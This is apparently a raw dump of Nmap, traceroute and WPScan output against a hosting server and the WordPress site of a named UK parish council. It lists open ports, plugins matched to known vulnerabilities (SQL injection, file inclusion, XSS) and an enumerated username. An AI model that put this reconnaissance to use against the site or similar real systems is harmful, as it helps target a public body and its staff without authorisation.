- HOP RTT ADDRESS
- 1 217.68 ms 10.238.204.1
- 2 217.72 ms 45.131.4.3
- 3 217.72 ms 109.236.95.224
- 4 217.74 ms 109.236.95.173
- 5 322.25 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 322.30 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 322.35 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 322.34 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 322.34 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 113.50 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 304.62 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 307.93 ms pegasus.terrassl.net (89.145.78.0)
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:36 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up.
- PORT STATE SERVICE VERSION
- 79/tcp filtered finger
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 258.91 ms 10.238.204.1
- 2 258.97 ms 45.131.4.2
- 3 258.96 ms 109.236.95.224
- 4 259.00 ms 109.236.95.173
- 5 259.02 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 259.07 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 259.10 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 259.14 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 259.13 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 112.64 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 240.17 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:36 EDT
- NSE: Loaded 164 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.00s elapsed
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 02:36
- Completed Parallel DNS resolution of 1 host. at 02:36, 0.03s elapsed
- Initiating SYN Stealth Scan at 02:36
- Scanning pegasus.terrassl.net (89.145.78.0) [1 port]
- Completed SYN Stealth Scan at 02:36, 0.55s elapsed (1 total ports)
- Initiating Service scan at 02:36
- Initiating OS detection (try #1) against pegasus.terrassl.net (89.145.78.0)
- Retrying OS detection (try #2) against pegasus.terrassl.net (89.145.78.0)
- Initiating Traceroute at 02:36
- Completed Traceroute at 02:36, 6.27s elapsed
- Initiating Parallel DNS resolution of 11 hosts. at 02:36
- Completed Parallel DNS resolution of 11 hosts. at 02:36, 0.40s elapsed
- NSE: Script scanning 89.145.78.0.
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.01s elapsed
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.00s elapsed
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up.
- PORT STATE SERVICE VERSION
- 80/tcp filtered http
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 248.46 ms 10.238.204.1
- 2 248.54 ms 45.131.4.2
- 3 248.53 ms 109.236.95.224
- 4 248.58 ms 109.236.95.173
- 5 248.60 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 248.64 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 248.68 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 248.71 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 248.74 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 144.44 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 200.27 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- NSE: Script Post-scanning.
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.00s elapsed
- Initiating NSE at 02:36
- Completed NSE at 02:36, 0.00s elapsed
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:42 EDT
- NSE: Loaded 164 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 02:42
- Completed Parallel DNS resolution of 1 host. at 02:42, 0.11s elapsed
- Initiating SYN Stealth Scan at 02:42
- Scanning pegasus.terrassl.net (89.145.78.0) [1 port]
- Completed SYN Stealth Scan at 02:42, 0.54s elapsed (1 total ports)
- Initiating Service scan at 02:42
- Initiating OS detection (try #1) against pegasus.terrassl.net (89.145.78.0)
- Retrying OS detection (try #2) against pegasus.terrassl.net (89.145.78.0)
- Initiating Traceroute at 02:42
- Completed Traceroute at 02:42, 6.27s elapsed
- Initiating Parallel DNS resolution of 11 hosts. at 02:42
- Completed Parallel DNS resolution of 11 hosts. at 02:42, 0.27s elapsed
- NSE: Script scanning 89.145.78.0.
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up.
- PORT STATE SERVICE VERSION
- 443/tcp filtered https
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 145.07 ms 10.238.204.1
- 2 249.16 ms 45.131.4.2
- 3 249.11 ms 109.236.95.224
- 4 249.20 ms 109.236.95.173
- 5 249.28 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 249.31 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 249.34 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 249.40 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 249.43 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 249.43 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 200.78 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- NSE: Script Post-scanning.
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- Initiating NSE at 02:42
- Completed NSE at 02:42, 0.00s elapsed
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:48 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up.
- PORT STATE SERVICE VERSION
- 5432/tcp filtered postgresql
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 225.65 ms 10.238.204.1
- 2 329.44 ms 45.131.4.2
- 3 329.49 ms 109.236.95.224
- 4 329.52 ms 109.236.95.173
- 5 329.55 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 329.58 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 329.61 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 329.64 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 329.68 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 121.43 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 311.67 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:50 EDT
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up.
- PORT STATE SERVICE VERSION
- 6667/tcp filtered irc
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 220.94 ms 10.238.204.1
- 2 324.83 ms 45.131.4.2
- 3 324.80 ms 109.236.95.224
- 4 324.86 ms 109.236.95.173
- 5 324.88 ms ge-1-0-8.border-1.thn.lon.uk.as29017.net (80.249.209.84)
- 6 324.93 ms ae3.core-2.maylands.hml.uk.as29017.net (89.145.125.34)
- 7 324.91 ms 83-223-96-111.as29017.net (83.223.96.111)
- 8 324.99 ms be11.asr01.thn.as20860.net (130.180.202.24)
- 9 324.98 ms be10.asr01.dc5.as20860.net (130.180.202.45)
- 10 116.51 ms po256.net1.north.dc5.as20860.net (130.180.203.4)
- 11 307.27 ms 1-103-223-83.xssl.net (83.223.103.1)
- 12 ... 30
- #######################################################################################################################################
- Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 02:51 EDT
- NSE: Loaded 47 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 02:51
- Completed NSE at 02:51, 0.00s elapsed
- Initiating NSE at 02:51
- Completed NSE at 02:51, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 02:51
- Completed Parallel DNS resolution of 1 host. at 02:51, 0.02s elapsed
- Initiating UDP Scan at 02:51
- Scanning pegasus.terrassl.net (89.145.78.0) [15 ports]
- Discovered open port 53/udp on 89.145.78.0
- Completed UDP Scan at 02:51, 2.47s elapsed (15 total ports)
- Initiating Service scan at 02:51
- Scanning 13 services on pegasus.terrassl.net (89.145.78.0)
- Service scan Timing: About 15.38% done; ETC: 03:02 (0:08:59 remaining)
- Completed Service scan at 02:53, 102.59s elapsed (13 services on 1 host)
- Initiating OS detection (try #1) against pegasus.terrassl.net (89.145.78.0)
- Retrying OS detection (try #2) against pegasus.terrassl.net (89.145.78.0)
- Initiating Traceroute at 02:53
- Completed Traceroute at 02:53, 7.13s elapsed
- Initiating Parallel DNS resolution of 1 host. at 02:53
- Completed Parallel DNS resolution of 1 host. at 02:53, 0.00s elapsed
- NSE: Script scanning 89.145.78.0.
- Initiating NSE at 02:53
- Completed NSE at 02:53, 7.83s elapsed
- Initiating NSE at 02:53
- Completed NSE at 02:53, 1.46s elapsed
- Nmap scan report for pegasus.terrassl.net (89.145.78.0)
- Host is up (0.19s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
- |_vulscan: ERROR: Script execution failed (use -d to debug)
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 500/udp open|filtered isakmp
- |_ike-version: ERROR: Script execution failed (use -d to debug)
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 104.29 ms 10.238.204.1
- 2 ... 3
- 4 103.20 ms 10.238.204.1
- 5 250.79 ms 10.238.204.1
- 6 250.78 ms 10.238.204.1
- 7 250.77 ms 10.238.204.1
- 8 250.76 ms 10.238.204.1
- 9 250.72 ms 10.238.204.1
- 10 104.68 ms 10.238.204.1
- 11 ... 18
- 19 103.88 ms 10.238.204.1
- 20 104.56 ms 10.238.204.1
- 21 ... 28
- 29 103.04 ms 10.238.204.1
- 30 127.00 ms 10.238.204.1
- NSE: Script Post-scanning.
- Initiating NSE at 02:53
- Completed NSE at 02:53, 0.00s elapsed
- Initiating NSE at 02:53
- Completed NSE at 02:53, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- #######################################################################################################################################
- [+] URL: https://www.mundesley-pc.gov.uk/
- [+] Started: Thu Sep 5 01:38:48 2019
- Interesting Finding(s):
- [+] https://www.mundesley-pc.gov.uk/
- | Interesting Entry: Server: Apache
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/xmlrpc.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] https://www.mundesley-pc.gov.uk/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Meta Generator (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: 'WordPress 5.2.2'
- | Confirmed By:
- | Plugin And Theme Query Parameter In Homepage (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/uk-cookie-consent/assets/css/style.css?ver=5.2.2
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/ubermenu/pro/assets/css/skins/simplegreen.css?ver=5.2.2
- | Rss Generator (Aggressive Detection)
- | - https://www.mundesley-pc.gov.uk/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- | - https://www.mundesley-pc.gov.uk/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- [+] WordPress theme in use: mundesleypc2017
- | Location: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/
- | Style URL: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css
- | Style Name: Mundesley Parish Council
- | Style URI: https://www.mundesley-pc.gov.uk
- | Description: A WordPress powered website with a custom theme (design)...
- | Author: Josh.biz Web Design
- | Author URI: http://www.josh.biz
- |
- | Detected By: Css Style (Passive Detection)
- | Confirmed By: Urls In Homepage (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css, Match: 'Version: 1.0'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:01:00 <==> (10 / 10) 100.00% Time: 00:01:00
- [i] User(s) Identified:
- [+] Doreen
- | Detected By: Rss Generator (Aggressive Detection)
- [+] Finished: Thu Sep 5 01:47:33 2019
- [+] Requests Done: 43
- [+] Cached Requests: 14
- [+] Data Sent: 5.981 KB
- [+] Data Received: 147.783 KB
- [+] Memory used: 95.906 MB
- [+] Elapsed time: 00:08:44
- #######################################################################################################################################
- [+] URL: https://www.mundesley-pc.gov.uk/
- [+] Started: Thu Sep 5 01:38:45 2019
- Interesting Finding(s):
- [+] https://www.mundesley-pc.gov.uk/
- | Interesting Entry: Server: Apache
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/xmlrpc.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] https://www.mundesley-pc.gov.uk/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Meta Generator (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: 'WordPress 5.2.2'
- | Confirmed By:
- | Plugin And Theme Query Parameter In Homepage (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/uk-cookie-consent/assets/css/style.css?ver=5.2.2
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/ubermenu/pro/assets/css/skins/simplegreen.css?ver=5.2.2
- | Rss Generator (Aggressive Detection)
- | - https://www.mundesley-pc.gov.uk/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- | - https://www.mundesley-pc.gov.uk/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- [+] WordPress theme in use: mundesleypc2017
- | Location: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/
- | Style URL: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css
- | Style Name: Mundesley Parish Council
- | Style URI: https://www.mundesley-pc.gov.uk
- | Description: A WordPress powered website with a custom theme (design)...
- | Author: Josh.biz Web Design
- | Author URI: http://www.josh.biz
- |
- | Detected By: Css Style (Passive Detection)
- | Confirmed By: Urls In Homepage (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css, Match: 'Version: 1.0'
- [+] Enumerating All Plugins (via Passive Methods)
- [+] Checking Plugin Versions (via Passive and Aggressive Methods)
- [i] Plugin(s) Identified:
- [+] ari-fancy-lightbox
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/ari-fancy-lightbox/
- | Latest Version: 1.3.6 (up to date)
- | Last Updated: 2019-04-06T06:31:00.000Z
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | Version: 1.3.6 (20% confidence)
- | Detected By: Query Parameter (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/ari-fancy-lightbox/assets/fancybox/jquery.fancybox.min.css?ver=1.3.6
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/ari-fancy-lightbox/assets/fancybox/jquery.fancybox.min.js?ver=1.3.6
- [+] mappress-google-maps-for-wordpress
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/mappress-google-maps-for-wordpress/
- | Latest Version: 2.53.1 (up to date)
- | Last Updated: 2019-07-11T21:30:00.000Z
- |
- | Detected By: Urls In Homepage (Passive Detection)
- | Confirmed By: Comment (Passive Detection)
- |
- | Version: 2.53.1 (70% confidence)
- | Detected By: Comment (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: 'MapPress Easy Google Maps Version:2.53.1'
- | Confirmed By: Query Parameter (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/mappress-google-maps-for-wordpress/css/mappress.css?ver=2.53.1%20PRO
- [+] monarch
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/monarch/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: ElegantThemes - Privilege Escalation
- | Fixed in: 1.2.7
- | References:
- | - https://wpvulndb.com/vulnerabilities/8394
- | - http://www.pritect.net/blog/elegant-themes-security-vulnerability
- | - http://wptavern.com/critical-security-vulnerability-discovered-in-elegant-themes-products
- |
- | The version could not be determined.
- [+] nextcellent-gallery-nextgen-legacy
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/nextcellent-gallery-nextgen-legacy/
- | Latest Version: 1.9.35 (up to date)
- | Last Updated: 2017-10-16T09:19:00.000Z
- |
- | Detected By: Comment (Passive Detection)
- |
- | Version: 3.2.10 (60% confidence)
- | Detected By: Comment (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: '<meta name="NextGEN" version="3.2.10"'
- [+] nextgen-gallery
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/nextgen-gallery/
- | Last Updated: 2019-08-28T00:11:00.000Z
- | [!] The version is out of date, the latest version is 3.2.11
- |
- | Detected By: Comment (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: Nextgen Gallery < 3.2.11 - SQL Injection
- | Fixed in: 3.2.11
- | References:
- | - https://wpvulndb.com/vulnerabilities/9816
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14314
- | - https://fortiguard.com/zeroday/FG-VD-19-099
- | - https://www.fortinet.com/blog/threat-research/wordpress-plugin-sql-injection-vulnerability.html
- |
- | Version: 3.2.10 (60% confidence)
- | Detected By: Comment (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: '<meta name="NextGEN" version="3.2.10"'
- [+] ubermenu
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/ubermenu/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] uk-cookie-consent
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/uk-cookie-consent/
- | Latest Version: 2.3.14
- | Last Updated: 2019-01-16T15:16:00.000Z
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: UK Cookie Consent <= 2.3.9 - Authenticated Stored Cross-Site Scripting (XSS)
- | Fixed in: 2.3.10
- | References:
- | - https://wpvulndb.com/vulnerabilities/9068
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10310
- | - https://plugins.trac.wordpress.org/changeset/1863058/uk-cookie-consent
- |
- | The version could not be determined.
- [+] wordfence
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/wordfence/
- | Latest Version: 7.4.0
- | Last Updated: 2019-08-22T15:25:00.000Z
- |
- | Detected By: Javascript Var (Passive Detection)
- |
- | [!] 12 vulnerabilities identified:
- |
- | [!] Title: Wordfence 3.8.6 - lib/IPTraf.php User-Agent Header Stored XSS
- | Fixed in: 3.8.7
- | Reference: https://wpvulndb.com/vulnerabilities/6140
- |
- | [!] Title: Wordfence 3.8.1 - Password Creation Restriction Bypass
- | Fixed in: 3.8.3
- | Reference: https://wpvulndb.com/vulnerabilities/6141
- |
- | [!] Title: Wordfence 3.8.1 - wp-admin/admin.php whois Parameter Stored XSS
- | Fixed in: 3.8.3
- | References:
- | - https://wpvulndb.com/vulnerabilities/6142
- | - https://packetstormsecurity.com/files/122993/
- | - https://www.securityfocus.com/bid/62053/
- |
- | [!] Title: Wordfence 3.3.5 - XSS & IAA
- | Fixed in: 3.3.7
- | References:
- | - https://wpvulndb.com/vulnerabilities/6143
- | - http://seclists.org/fulldisclosure/2012/Oct/139
- |
- | [!] Title: Wordfence 5.2.4 - Unspecified Issue
- | Fixed in: 5.2.5
- | Reference: https://wpvulndb.com/vulnerabilities/7581
- |
- | [!] Title: Wordfence 5.2.4 - IPTraf.php URI Request Stored XSS
- | Fixed in: 5.2.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7582
- | - https://packetstormsecurity.com/files/128259/
- |
- | [!] Title: Wordfence 5.2.3 - Banned IP Functionality Bypass
- | Fixed in: 5.2.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/7583
- | - https://packetstormsecurity.com/files/128259/
- | - http://seclists.org/fulldisclosure/2014/Sep/49
- | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
- |
- | [!] Title: Wordfence 5.2.3 - Multiple Vulnerabilities
- | Fixed in: 5.2.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/7612
- | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
- |
- | [!] Title: Wordfence <= 5.2.4 - Multiple Vulnerabilities (XSS & Bypasses)
- | Fixed in: 5.2.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7636
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4664
- | - https://secupress.me/blog/wordfence-5-2-5-security-update/
- | - https://www.securityfocus.com/bid/70915/
- |
- | [!] Title: Wordfence 5.2.2 - XSS in Referer Header
- | Fixed in: 5.2.3
- | References:
- | - https://wpvulndb.com/vulnerabilities/7698
- | - https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
- |
- | [!] Title: Wordfence <= 5.1.4 - Cross-Site Scripting (XSS)
- | Fixed in: 5.1.5
- | References:
- | - https://wpvulndb.com/vulnerabilities/7711
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4932
- |
- | [!] Title: Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
- | Fixed in: 7.1.14
- | References:
- | - https://wpvulndb.com/vulnerabilities/9135
- | - http://www.waraxe.us/advisory-109.html
- | - https://packetstormsecurity.com/files/149845/
- |
- | The version could not be determined.
- [+] wordpress-seo
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/wordpress-seo/
- | Last Updated: 2019-09-03T07:32:00.000Z
- | [!] The version is out of date, the latest version is 12.0
- |
- | Detected By: Comment (Passive Detection)
- |
- | Version: 11.8 (60% confidence)
- | Detected By: Comment (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: 'optimized with the Yoast SEO plugin v11.8 -'
- [+] wp-rocket
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/wp-rocket/
- |
- | Detected By: Comment (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: WP Rocket <= 2.10.3 - Local File Inclusion (LFI)
- | Fixed in: 2.10.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/8872
- | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11658
- | - https://wp-rocket.me/changelog
- | - https://gist.github.com/Shinkurt/157dbb3767c9489f3d754f79b183a890
- |
- | The version could not be determined.
- [+] wpfront-scroll-top
- | Location: https://www.mundesley-pc.gov.uk/wp-content/plugins/wpfront-scroll-top/
- | Latest Version: 2.0.2
- | Last Updated: 2019-05-21T06:27:00.000Z
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] Enumerating Config Backups (via Passive and Aggressive Methods)
- Checking Config Backups - Time: 00:02:30 <=============> (21 / 21) 100.00% Time: 00:02:30
- [i] No Config Backups Found.
- [+] Finished: Thu Sep 5 02:03:23 2019
- [+] Requests Done: 106
- [+] Cached Requests: 11
- [+] Data Sent: 8.998 KB
- [+] Data Received: 24.314 MB
- [+] Memory used: 201.77 MB
- [+] Elapsed time: 00:24:37
- #######################################################################################################################################
- [+] URL: https://www.mundesley-pc.gov.uk/
- [+] Started: Thu Sep 5 02:08:44 2019
- Interesting Finding(s):
- [+] https://www.mundesley-pc.gov.uk/
- | Interesting Entry: Server: Apache
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/xmlrpc.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] https://www.mundesley-pc.gov.uk/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] https://www.mundesley-pc.gov.uk/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- Fingerprinting the version - Time: 00:00:10 <=========> (362 / 362) 100.00% Time: 00:00:10
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Meta Generator (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/, Match: 'WordPress 5.2.2'
- | Confirmed By:
- | Plugin And Theme Query Parameter In Homepage (Passive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/uk-cookie-consent/assets/css/style.css?ver=5.2.2
- | - https://www.mundesley-pc.gov.uk/wp-content/plugins/ubermenu/pro/assets/css/skins/simplegreen.css?ver=5.2.2
- | Unique Fingerprinting (Aggressive Detection)
- | - https://www.mundesley-pc.gov.uk/wp-admin/css/media.css md5sum is 16375f6512d5a1e04dbb884a02ba658a
- [+] WordPress theme in use: mundesleypc2017
- | Location: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/
- | Style URL: https://www.mundesley-pc.gov.uk/wp-content/themes/mundesleypc2017/style.css
- | Style Name: Mundesley Parish Council
- | Style URI: https://www.mundesley-pc.gov.uk
- | Description: A WordPress powered website with a custom theme (design)...
- | Author: Josh.biz Web Design
- | Author URI: http://www.josh.biz
- |
- | Detected By: Css Style (Passive Detection)
- | Confirmed By: Urls In Homepage (Passive Detection)
- |
- | Version: 1.0 (80% confidence)
- | Detected By: Style (Passive Detection)
